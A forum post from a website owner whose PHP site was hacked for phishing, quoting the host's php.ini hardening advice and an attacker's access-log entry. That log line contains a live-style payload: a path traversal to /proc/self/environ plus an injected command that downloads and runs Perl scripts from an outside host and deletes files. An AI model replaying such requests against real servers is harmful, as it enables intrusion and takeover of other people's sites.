My website has been attacked for phishing purposes. It is a complex website however I only use post and PHP files.

How could they attack me? I only use $_POST so I believe no SQL command and parameters are visible. There is no framework just my little coding listing and accessing on the website.

Any hint/suggestion would be appreciated.

Sorry if I don’t reply straight but I am dealing with my provider who blocked the whole site.

this is their answer (any comment on it will be welcomed):

Because script injection attacks the site code itself, it is able to completely avoid webserver security. Unfortunately, some content management systems (especially older versions of Joomla) are extremely susceptible to this form of attack.

A simple way to remove the ability for attackers to use this method is to add a php.ini file at the top-level of the website with the following contents – be aware though that the web-site will need testing afterwards to ensure that no legitimate web-site scripted actions have been affected by the change:

The php.ini directives are…

allow_url_include = “0”

allow_url_fopen = “0”

update:

here is what I got from the webhost company:

121.254.216.170 – – [12/Sep/2011:05:21:07 +0100] “GET /?p=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 5806 “-” “http://some.thesome.com/etc/byz.jpg? -O /tmp/cmd548;cd /tmp;lwp-download http://some.thesome.com/etc/cup.txt;perl cup.txt;rm -rf *.txt*;wget
http://some.thesome.com/etc/update.txt;perl update.txt;rm -rf *.txt*’); echo \”#j13mb0t\”; ?>”